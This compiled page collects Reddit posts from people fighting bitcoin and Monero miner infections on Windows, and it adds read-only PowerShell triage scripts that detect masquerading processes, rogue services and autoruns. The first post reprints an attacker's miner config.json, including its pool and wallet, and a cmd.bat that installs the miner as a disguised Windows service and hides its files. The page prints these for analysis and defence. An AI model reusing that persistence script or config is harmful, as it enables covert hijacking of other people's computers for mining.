Bitcoin Miner Virus - How to detect and remove it ...

MoneroOcean pool owner supports botnets

Hi guys,
Recently my VPS that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as its configuration file and I'm posting the contents publicly here as well:
{
  "algo": "cryptonight",
  "api": {
    "port": 0,
    "access-token": null,
    "id": null,
    "worker-id": null,
    "ipv6": false,
    "restricted": true
  },
  "asm": true,
  "autosave": true,
  "av": 0,
  "background": false,
  "colors": true,
  "cpu-affinity": null,
  "cpu-priority": null,
  "donate-level": 0,
  "huge-pages": true,
  "hw-aes": null,
  "log-file": null,
  "max-cpu-usage": 100,
  "pools": [
    {
      "url": "gulf.moneroocean.stream:80",
      "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq",
      "pass": "x",
      "rig-id": null,
      "nicehash": false,
      "keepalive": false,
      "variant": -1,
      "enabled": true,
      "tls": false,
      "tls-fingerprint": null
    }
  ],
  "print-time": 60,
  "retries": 5,
  "retry-pause": 5,
  "safe": false,
  "threads": [
    { "low_power_mode": 1, "affine_to_cpu": false, "asm": true },
    { "low_power_mode": 1, "affine_to_cpu": false, "asm": true },
    { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }
  ],
  "user-agent": null,
  "watch": true
}
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat*
net stop Networks
taskkill /f /im system.exe
C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe
sc config "Networks20181019" DisplayName= "Networksr20181019"
sc description "Networks20181019" "Microsoft Windows Networks"
Set ProcessName=system.exe
sc start "Networks20181019"
attrib +a +s +r +h C:\WINDOWS\Debug\nat*
echo u/off
del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. In short, he doesn't want to ban the miner.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase the difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as a proxy). I won't post the IPs publicly.
What more can I do? The pool owner also threatened to report another XMR wallet address to the SupportXMR pool because he thought I was a competitive attacker. I can give that address as well.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero
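What the batch file above does is plain from its commands: it unhides its drop directory, registers system.exe as a Windows service named "Networks20181019" through a service-wrapper binary that the attacker named svchost.exe, gives the service a Microsoft-sounding description, starts it, re-hides the directory with the system and hidden attributes, and deletes the original dropper from the desktop. The config.json is in XMRig's layout and tells you the miner talks to gulf.moneroocean.stream on port 80 without TLS. The script below is an added example written for this page, not code from the post or from the attacker's tooling. Part 1 pulls the network indicators out of a config.json (a trimmed copy of the one posted above is embedded); part 2 lists services whose binary sits outside System32, SysWOW64 or Program Files, the pattern cmd.bat created, together with each binary's Authenticode signer; part 3 lists files hidden under %SystemRoot%\Debug the way attrib +s +h hid them. The set of trusted directories is this example's own assumption and is deliberately narrow, because %SystemRoot%\Debug is itself under %SystemRoot%.

```powershell
# Added example (not from the post above and not the attacker's tooling).
# Read-only triage; run from an elevated PowerShell 3.0+ prompt.

# ---- 1) Indicators from the miner config ------------------------------------
# Trimmed copy of the config.json posted above; the key set is XMRig's format.
$configJson = @'
{ "algo": "cryptonight", "donate-level": 0, "max-cpu-usage": 100,
  "pools": [ { "url": "gulf.moneroocean.stream:80",
               "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq",
               "pass": "x", "tls": false, "enabled": true } ],
  "threads": [ { "low_power_mode": 1 }, { "low_power_mode": 1 }, { "low_power_mode": 1 } ] }
'@

function Get-MinerIndicators {
    param([string]$Json)
    $cfg = $Json | ConvertFrom-Json
    foreach ($pool in $cfg.pools) {
        # url may carry a scheme (stratum+tcp://host:port); strip it before splitting
        $hostName, $port = ($pool.url -replace '^[a-z+]+://', '') -split ':', 2
        [pscustomobject]@{
            PoolHost    = $hostName
            PoolPort    = [int]$port
            Tls         = [bool]$pool.tls        # false: stratum in cleartext, visible on the wire
            Wallet      = $pool.user             # payout address: the pivot for abuse reports
            DonateLevel = $cfg.'donate-level'    # 0: the miner's built-in developer fee switched off
            Threads     = @($cfg.threads).Count
            MaxCpuPct   = $cfg.'max-cpu-usage'
        }
    }
}
Get-MinerIndicators -Json $configJson | Format-List

# ---- 2) Services started from outside the trusted trees ---------------------
# Assumption of this example: only these roots are trusted. %SystemRoot% as a
# whole is NOT, because the batch file dropped into C:\WINDOWS\Debug\nat.
# Legitimate outliers (e.g. %SystemRoot%\Microsoft.NET) show up too; use the
# signer column to triage them.
$trusted = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64",
             $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

function Get-ServiceBinary {
    # Win32_Service.PathName looks like  C:\x\y.exe -args  or  "C:\x y\z.exe" -args
    param([string]$PathName)
    if ($PathName -match '^\s*"([^"]+)"')        { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)(\s|$)') { return $Matches[1] }
    return $PathName
}

function Test-UntrustedLocation {
    param([string]$Path)
    foreach ($root in $trusted) {
        if ($Path.StartsWith("$root\", [System.StringComparison]::OrdinalIgnoreCase)) { return $false }
    }
    return $true
}

Get-CimInstance Win32_Service | ForEach-Object {
    $bin = Get-ServiceBinary -PathName $_.PathName
    if ($bin -and (Test-UntrustedLocation -Path $bin)) {
        $sig = if (Test-Path -LiteralPath $bin) { Get-AuthenticodeSignature -FilePath $bin } else { $null }
        [pscustomobject]@{
            Service     = $_.Name
            DisplayName = $_.DisplayName
            Description = $_.Description   # "Microsoft Windows Networks" with a non-Microsoft signer is the tell
            State       = $_.State
            StartMode   = $_.StartMode
            Binary      = $bin
            Signature   = if ($sig) { $sig.Status } else { 'file missing' }
            Signer      = if ($sig) { $sig.SignerCertificate.Subject } else { '' }
        }
    }
} | Format-List

# ---- 3) Files hidden the way cmd.bat hid them (attrib +s +h) -----------------
Get-ChildItem -LiteralPath "$env:SystemRoot\Debug" -Recurse -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.Attributes -match 'Hidden' -and $_.Attributes -match 'System' } |
    Select-Object FullName, Length, LastWriteTime, Attributes
```

Part 2 keys on the binary path and signer rather than on the service name or description, because both of those were chosen by the attacker to look like Windows. On Windows 7, catalog-signed Microsoft binaries can report NotSigned from Get-AuthenticodeSignature, so treat a NotSigned result under System32 as "check further", not as proof of malice.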

At my wit's end with virus removal

So I have at least one virus on my computer. The one I know of is some sort of bitcoin miner, I know this because my gpu usage is constantly at 100% and the fan goes crazy as well as hitmanpro categorizing files with names like bitcoinminer.
I have managed to remove every suspicious file I could find and ran antivirus and antimalware until they couldn't detect anything else but the virus keeps coming back.
The main places I think the virus is focused around are the C:\Users\Tony\AppData\Local\Temp and C:\Users\Tony\AppData\Local\WinSXS folders.
I have booted into safe mode, deleted everything in the temp folder, and gave myself permission to delete the WinSXS folder. Every time I boot normally the WinSXS folder just comes back. I know something is up with this folder because rkill always terminates it as well as the other antimalware not liking it.
When I normally boot there is a folder in the temp folder with a name that's just a random string of numbers and letters that I can't delete. It says it's open in another program. I searched for the folder name in the Resource Monitor CPU tab and it was associated with svchost.exe and a couple of other things. I'm wondering if the virus is somehow tied to svchost.
So here's a rundown of the steps I've been taking (repeatedly) to try to take care of this.
  1. Boot into safe mode (by switching my psu off then on to get to the boot menu)
  2. Show hidden files and folders
  3. Delete everything from the local\temp folder
  4. Delete unknown files from C:\ProgramData and C:\Users\User\AppData\Roaming
  5. Remove any weird keys from HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  6. Empty Recycle Bin
  7. Run rkill
  8. Run adwcleaner
  9. Run malwarebytes (with rootkit checker)
  10. Run Hitmanpro
  11. Run combofix
  12. Run the trojan remover from https://www.simplysup.com/
  13. Reboot computer normally
  14. Run malwarebytes, watch as it finds the same malware as a million times before
  15. Listen to my fan speed fluctuate like crazy
  16. Run rkill, it kills a WinSXS process, which does nothing
  17. Cry uncontrollably
So uh, what the hell should I do?
OS: Windows 7
submitted by Froggyfrogger to techsupport
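The poster above sees a temp folder held open by svchost.exe and a fake "WinSXS" folder under AppData\Local that returns after every boot. The real WinSxS store lives under C:\Windows, never under a user profile, and a genuine svchost.exe only loads service DLLs from under %SystemRoot%, so the question to answer is which service registration makes svchost load something from AppData or Temp. The script below is an added example written for this page, not code from the post: it maps each svchost.exe instance to the services it hosts, lists any module it has loaded from a user-writable directory, and resolves the ServiceDll value each svchost-hosted service registers. The regular expression for "user-writable" is this example's assumption (profiles under \Users, plus Windows\Temp, ProgramData and Windows\Debug).

```powershell
# Added example (not from the post above): which svchost.exe loads what, and
# which service registration points at it. Read-only; run elevated so that
# module lists of other users' processes are readable. PowerShell 3.0+.

# Directories a service DLL has no business living in (assumption of this example)
$userWritable = '\\Users\\[^\\]+\\AppData\\|\\Windows\\Temp\\|\\ProgramData\\|\\Windows\\Debug\\'

function Get-OddModules {
    param([int]$ProcessId)
    try {
        (Get-Process -Id $ProcessId -ErrorAction Stop).Modules |
            Where-Object { $_.FileName -match $userWritable } |
            Select-Object -ExpandProperty FileName
    } catch { @() }   # protected process or access denied
}

$services = Get-CimInstance Win32_Service

"== svchost.exe instances: hosted services, CPU seconds, modules from odd places =="
Get-CimInstance Win32_Process -Filter "Name = 'svchost.exe'" | ForEach-Object {
    $procId = $_.ProcessId
    [pscustomobject]@{
        PID        = $procId
        Path       = $_.ExecutablePath   # anything but System32/SysWOW64 is not Windows' svchost
        CpuSeconds = [math]::Round(($_.KernelModeTime + $_.UserModeTime) / 1e7, 1)   # WMI counts 100 ns units
        Services   = ($services | Where-Object { $_.ProcessId -eq $procId } | ForEach-Object { $_.Name }) -join ','
        OddModules = (Get-OddModules -ProcessId $procId) -join ','
    }
} | Sort-Object CpuSeconds -Descending | Format-Table -AutoSize -Wrap

"== svchost-hosted services whose ServiceDll is outside %SystemRoot% =="
function Get-ServiceDll {
    param([string]$Name)
    $p = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name\Parameters"
    if (Test-Path -LiteralPath $p) {
        (Get-ItemProperty -LiteralPath $p -ErrorAction SilentlyContinue).ServiceDll   # REG_EXPAND_SZ comes back expanded
    }
}
$sysRoot = [regex]::Escape($env:SystemRoot)
$services | Where-Object { $_.PathName -match 'svchost\.exe' } | ForEach-Object {
    $dll = Get-ServiceDll -Name $_.Name
    if ($dll -and $dll -notmatch "^$sysRoot\\") {
        [pscustomobject]@{ Service = $_.Name; DisplayName = $_.DisplayName; StartMode = $_.StartMode; ServiceDll = $dll }
    }
} | Format-Table -AutoSize -Wrap
```

The CPU column is cumulative process time, so the svchost instance that has been mining since boot will sort to the top even if it happens to be idle at the moment you look. A service found by the second query is removed by stopping it and deleting its registry key (sc stop / sc delete) before the files are deleted; deleting the files first is what produces the "it comes back on reboot" loop the post describes.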

Bitcoin Miner malware, detected with Malware Bytes but I believe it's still hidden somewhere.

So a few days ago I did something stupid and tried to torrent a game for the first time and ended up installing a Bitcoin Miner onto my PC :/ It was very obvious that it was malware as it quickly seemed to hijack Google Chrome. I scanned with Windows Defender but nothing was found so I checked out the sticky post on here and got a trial of Malwarebytes, which detected the malware and quarantined it, then I removed it. I really thought it was that simple but I think it's still there. I had Spotify playing music on idle and got curious, did CTRL + ALT + DELETE to open up Task Manager and quickly saw my CPU % shoot down from 100% to 2% - 5%, which is what it's been sitting at when I'm using it right now.
Other than that, there are a couple of weird things that make me think the virus is still there:
  1. Programs keep getting Suspended status in Task Manager (this is happening to Malwarebytes and Google Chrome), which never used to happen before. This is a brand new PC I built in January so it shouldn't be doing this that often. I tried to open Malwarebytes now to scan again and it just froze on "Not Responding" and I can't seem to close it...
  2. There is a strange "Suspended" background process in Task Manager that uses up 3.6MB of memory. Here's a screenshot of what it looks like: http://prntscr.com/lchp1w :(
  3. When I right click "open file location" on the suspended process and the 2 others below it, the location I get is C:\Windows\SysWOW64 and it's titled svchost.exe, which I read is a normal Windows process but there are A LOT of them running in my Task Manager right now
  4. All the other svchost.exes are under C:\Windows\System32, which I read is fine. Does this mean that the one in SysWOW64 is malware/infected?
As per the stickied thread, I ran rkill.com and turned on "scan for rootkits" in my Malware Bytes trial, and also ran the ADWCleaner. I did all of the above after I had originally removed the malware with Malware Bytes, so all these second scans didn't detect anything. Is there anything else I could do to actually detect the malware and remove it?
EDIT: Google Chrome keeps not responding, same with Malware Bytes. Can't uninstall Malware Bytes and Firefox stopped responding too. Writing this on my phone since I turned everything off briefly after writing this post, since my mouse started moving extremely slow and a repetitive beeping sound started coming out of my speakers. I swear it was like whatever infected me detected whenever I looked up information on malware removal and visited this subreddit ...
submitted by rsarector to techsupport

Insanely high CPU usage from service host DCOM

So this has happened to me for a while but sometimes my computer will just spazz out and completely slow down as a result of Service Host DCOM. Here are the screenshots I've made (no idea why this happens and no idea what they mean so hopefully you guys can help me out).
  1. Screenshot 1 showing basic task manager details
  2. Screenshot 2 when I right click on the offending processes and go to "more details"
  3. Screenshot 3 when I right click on the offending svchost and go to "more details" again
I've run virus scans (Avast), malware (Malwarebytes) scans etc. and found nothing. This problem has happened to me for ages and it seems completely random. The only time I've had any issues malware-wise was a bitcoin miner (SoundMixer) that I got from a torrent I downloaded which has since been resolved, but the problem persisted long before I ever had that problem, so I don't think it's the issue.
System specs: Windows 10, 8 GB RAM, 980 GPU, 4690K CPU
Thanks in advance
submitted by AlphaKennyBody02 to techsupport

GoogleUpdateService CMD Virus?

Hi, it's been more than a year since my PC got infected by some Russian adware which every time opens up some Russian website full of scammy ads in my default browser. It always opens up that website exactly 15 minutes after I boot up the PC, fortunately only once per boot session. Now I've finally got rid of it, mainly because I downloaded some file that was filled with more Russian adware, that set some Russian site as the home page in all of my browsers, then probably a bitcoin miner I reckon, because after that svchost.exe was using 50% of my CPU the whole time.
So I installed good ol' Malwarebytes, ran a full scan, found malware and a bunch of infected files and registry entries, quarantined 'em all and finally no annoying Russian pop-ups and bitcoin miner.
However, after a while when I boot up, a CMD window pops up in the background, which contains some lines saying it's GoogleUpdateService and downloading some stuff, and after it's finished with downloading, Malwarebytes quarantines it.
Is it really the Google Update Service, which by weird coincidence started to pop up after I finally cleaned my PC with Malwarebytes, or is it, as I reckon, some remaining rusky virus?
Malwarebytes quarantines the following two files after that:
Adware.File.Tour - C:\Users\Exelzior\AppData\Local\Temp\GoogleUpdate_203093539.exe
Riskware.Tool.CK - C:\Windows\KMSEmulator.exe
submitted by MrExelzior to techsupport

[BitCoin Miner Virus] Need assistance in its removal.

Hi All,
I am a fully qualified Support Tech and have managed to download myself a BitCoin Miner Virus (or what I believe to be) on my Personal/Gaming computer.
How: Torrented FIFA 15, Installed It, Issues Ensued.
What: There are 2 processes that start up on boot, they are disguised as system processes:
svchost.exe
lsass.exe
They are located in the C:\Windows\Temp folder. I can kill the processes without issue and remove the .exe files, but they return on boot.
What Do They Do:
svchost.exe = runs CPU at 75%
lsass.exe = run GPU at 100%
I disconnected the internet to see if it was a BitCoin miner but they stayed at 100%. Possibly disguising what they actually are.
What I have done so far, and the result:
  1. Killed processes, deleted .EXEs: Processes die without issue and the .EXEs delete immediately, but they return on reboot.
  2. Ran Malwarebytes... twice: Located the problem .EXE files and removed them; also located some more versions in the IExplore/Temp directory and deleted them, but the issue is persistent.
  3. Found and removed suspect registry entries: There weren't many, but I searched for SVCHOST and LSASS and located a few registry entries attached to FIFA15 installation keys and removed them.
  4. Followed the steps in this Reddit entry: http://bit.ly/1GNgUaZ (shortened URL for formatting purposes): But the processes and .EXE files don't match and the registry key isn't found in the suggested location.
Help me Obi-Wan Kenobi.... You're my only hope.
submitted by hackthefortress to techsupport

Need assistance removing the most pesky malware I've ever come across.

System specs:
(genuine)Windows 8.1
i5 3570K
8 GB RAM
GTX 760
No overclocking.
Upon starting my computer, this always happens:
Gee. I wonder who the culprit is
More info on this little shit
The file is svchost.exe and is located in the Windows\Temp folder. This is obviously the malware. So I run a scan with Malwarebytes and it detects it as a bitcoin miner. I properly delete it and it's all fine. But if I turn off my computer completely, it will come back in the same place. This virus causes my computer to be laggy and unusable for gaming.
I've tried Adwcleaner, Windows Defender, and Rkill. Same results on them all.
I downloaded hijackthis but I don't know how to use it. Any help on this would be awesome.
submitted by BearOnDrums to techsupport
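Three of the posts above (the SysWOW64 svchost.exe question, the svchost.exe/lsass.exe pair in C:\Windows\Temp, and the svchost.exe in Windows\Temp that returns after every shutdown) come down to the same two checks: is a process that carries a Windows system name running from the directory where that binary genuinely lives, and which autorun entry re-creates it at boot. For the record, C:\Windows\SysWOW64\svchost.exe is the legitimate 32-bit copy and is expected on 64-bit Windows; lsass.exe has no legitimate copy outside System32, so one in Windows\Temp is malicious by location alone, and the same goes for any "svchost.exe" there. The script below is an added example written for this page, not code from any of the posts: it flags processes whose name is in an allow-list of system binaries but whose path is not, prints each one's Authenticode signer, and then inventories the Run/RunOnce keys, scheduled tasks whose action points into a user-writable directory, and permanent WMI event subscriptions. The name-to-directory allow-list and the "user-writable" pattern are this example's assumptions and can be extended per host.

```powershell
# Added example (not from any of the posts above). Read-only; run from an
# elevated PowerShell 3.0+ prompt so ExecutablePath is readable for every process.

$sys = $env:SystemRoot
# Assumption of this example: where a genuine copy may live. svchost.exe exists in
# both System32 and SysWOW64 (the 32-bit copy); the others only in System32;
# system.exe is not a Windows binary at all, so any hit is suspicious.
$expected = @{
    'svchost.exe'  = @("$sys\System32", "$sys\SysWOW64")
    'lsass.exe'    = @("$sys\System32")
    'csrss.exe'    = @("$sys\System32")
    'services.exe' = @("$sys\System32")
    'winlogon.exe' = @("$sys\System32")
    'system.exe'   = @()
}

function Test-MasqueradingProcess {
    param([string]$Name, [string]$Path)
    $key = $Name.ToLower()
    if (-not $expected.ContainsKey($key)) { return $false }
    if (-not $Path) { return $false }    # protected process with unreadable path: verify separately
    $dir = Split-Path -Parent $Path
    foreach ($ok in $expected[$key]) { if ($dir -ieq $ok) { return $false } }
    return $true
}

"== Processes named like system binaries but running from elsewhere =="
Get-CimInstance Win32_Process |
    Where-Object { Test-MasqueradingProcess -Name $_.Name -Path $_.ExecutablePath } |
    ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.ExecutablePath
        [pscustomobject]@{
            PID       = $_.ProcessId
            Name      = $_.Name
            Path      = $_.ExecutablePath
            ParentPID = $_.ParentProcessId    # the dropper or the service that launched it
            Signature = $sig.Status           # catalog-signed files can show NotSigned on Windows 7
            Signer    = $sig.SignerCertificate.Subject
            CmdLine   = $_.CommandLine        # miners often carry the pool URL right here
        }
    } | Format-List

"== Run / RunOnce entries =="
$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
function Get-RunEntries {
    foreach ($k in $runKeys) {
        if (-not (Test-Path -LiteralPath $k)) { continue }
        $props = Get-ItemProperty -LiteralPath $k
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # PSPath, PSParentPath, ... are provider noise, not values
            [pscustomobject]@{ Key = $k; Name = $p.Name; Command = $p.Value }
        }
    }
}
Get-RunEntries | Format-Table -AutoSize -Wrap

"== Scheduled tasks whose action points into a user-writable directory =="
# schtasks also works on Windows 7 (Get-ScheduledTask needs Windows 8 or later).
# Column names are the English ones; other locales rename them. schtasks repeats
# the header row per task folder, which is why the TaskName header is filtered out.
$writable = '\\Users\\[^\\]+\\AppData\\|\\Windows\\Temp\\|\\ProgramData\\|\\Windows\\Debug\\'
schtasks /query /fo CSV /v | ConvertFrom-Csv |
    Where-Object { $_.TaskName -ne 'TaskName' -and $_.'Task To Run' -match $writable } |
    Select-Object TaskName, 'Task To Run', 'Run As User', 'Schedule Type' | Format-Table -AutoSize -Wrap

"== Permanent WMI event subscriptions (a fileless way to re-drop a miner) =="
Get-CimInstance -Namespace root\subscription -ClassName __EventConsumer |
    Select-Object Name, @{ n = 'Type'; e = { $_.CimClass.CimClassName } }, CommandLineTemplate, ScriptText
```

Kill the flagged process and remove its autorun entry in the same session before deleting the file; a file deleted while its Run key, task or service still exists is simply written back at the next boot, which is the loop every one of these posts describes. If none of the four inventories explains the re-creation, the remaining usual suspects are a service (covered by the service audit added earlier on this page) or a browser extension, which is what the Chrome hijack in the third post suggests.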

Used Malwarebytes to remove bitcoin miner trojan, PC stuck at startup repair.

I noticed I was getting ridiculously high CPU usage when I was idle, caused by svchost. I checked around for a bit and decided to run MBAM to see if it was a virus. Lo and behold, it found a bitcoin miner trojan. I had it delete the infected files. The computer is now stuck at startup repair and has been going for about an hour and a half.
Using Windows 7 Ultimate, and I don't think it matters but I'm running a Z97X mobo, i7-4790k and a 550ti.
submitted by Instincthr to techsupport

Related threads and snippets:

Pests of all kinds and how to fight them: Virus (bitcoinminer) via svhost.exe, Windows 7. If you are not sure whether you have caught malware or a trojan, open a thread here. An expert will reply with further instructions and help you remove the malware or uninstall or delete unwanted software. Please describe your problem as precisely as ...

As I had a bitcoin mining virus before, I remembered the same symptom and did some things: ComboFix: I ran it once and it seemed to fix my problem until I restarted. Kaspersky: was unable to do anything but recognise the virus. I tried the secure disc but it couldn't get rid of the virus. Malwarebytes: it found two svchost.exe and two lsass ...

Page 1 of 2 - Trojan.Agent.Mnr (Bitcoin Miner) running fake svchost.exe and lsass.exe - posted in Virus, Trojan, Spyware, and Malware Removal Help: Hello, my PC has been infected by this Trojan.

BitCoin miner virus or BitCoin mining virus is a dangerous malware that may use your CPU and/or GPU to obtain BitCoin cryptocurrency by mining illegally. Cryptocurrency miners keep hitting computers and trying to use their resources to generate revenue for their developers. Even though this type of infection is called BitCoinMiner, it does mine for digital currencies such as Monero ...
